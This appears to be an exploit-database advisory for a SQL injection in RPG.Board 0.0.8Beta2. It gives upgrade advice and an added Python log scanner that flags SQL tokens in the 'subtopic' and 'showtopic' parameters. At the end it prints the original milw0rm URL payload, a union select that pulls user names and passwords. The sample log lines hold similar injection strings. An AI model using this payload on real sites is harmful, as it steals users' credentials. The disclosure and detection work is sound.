Vendor: RPG.Board
By: 0x90
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: RPG.Board
Affected Version From: 0.0.8Beta2
Affected Version To: 0.0.8Beta2
Patch Exists: YES
Related CWE: N/A
CPE: a:rpgmaster:rpg.board
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

RPG.Board <= 0.0.8Beta2 Remote SQL Injection

A SQL injection vulnerability exists in RPG.Board 0.0.8Beta2. An attacker can send a specially crafted HTTP request to index.php, using the 'subtopic' and 'showtopic' parameters, to execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of RPG.Board.
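
A detection-side complement to the upgrade advice, added here as an example (not code from RPG.Board or from the original advisory): it scans access-log lines for requests to index.php whose 'subtopic' or 'showtopic' value is not a plain id. It assumes legitimate values are empty or decimal and that logs use the combined format; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

WATCHED = ("subtopic", "showtopic")  # parameters named in the advisory
# Assumption: legitimate values are empty or a plain decimal id.
PLAIN_ID = re.compile(r"\d*")
# SQL tokens that have no place in an id parameter.
SQL_TOKENS = re.compile(r"\b(union|select|concat|from)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # request field

def suspicious_params(url):
    """Return {param: [reasons]} for watched parameters that are not plain ids."""
    parts = urlsplit(url)
    if not parts.path.endswith("/index.php"):
        return {}
    # parse_qs decodes %xx and '+'; keep_blank_values keeps a bare 'subtopic'.
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = {}
    for name in WATCHED:
        for value in query.get(name, []):
            reasons = []
            if not PLAIN_ID.fullmatch(value):
                reasons.append("non-numeric")
            if SQL_TOKENS.search(value):
                reasons.append("sql-keyword")
            if reasons:
                findings[name] = reasons
    return findings

def scan(lines):
    """Yield (line_number, findings) for log lines with suspicious requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            findings = suspicious_params(match.group(1))
            if findings:
                yield number, findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?subtopic&showtopic=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?subtopic&showtopic=-1+union+select+null,null HTTP/1.1" 200 7312',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?showtopic=7%20UNION%20SELECT%201 HTTP/1.1" 200 6100',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /other.php?showtopic=union HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

A hit only shows that a request carried a non-id value; whether the query reached the database depends on the installed version.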

Exploit-DB raw data:

    _____          ____   _____    ____   _____   __  __    _____   ____
   /  _  \ /\  /\ / _  \ /  _  \  / ___| /  _  \ /  \/  \  /  _  \ / _  |
   | | | | \ \/ / ||_| | | | | |  | |    | | | | | \__/ |  | |_| | ||_|_|
   | | | |  \  /  \__  | | | | |  | |    | | | | | |  | |  |  _  | |   \
   | |_| |  /  \   __| | | |_| |/\| |__  | |_| | | |  | |/\| | | | | |\ \
   \_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_|  |_|\/|_| |_| |_| \_|
           \/  \/

[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: RPG.Board

[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69

[~] Vulnerability Class: SQL Injection



[~] Exploit:

Register, log in and test the exploit.

http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin

# milw0rm.com [2008-09-26]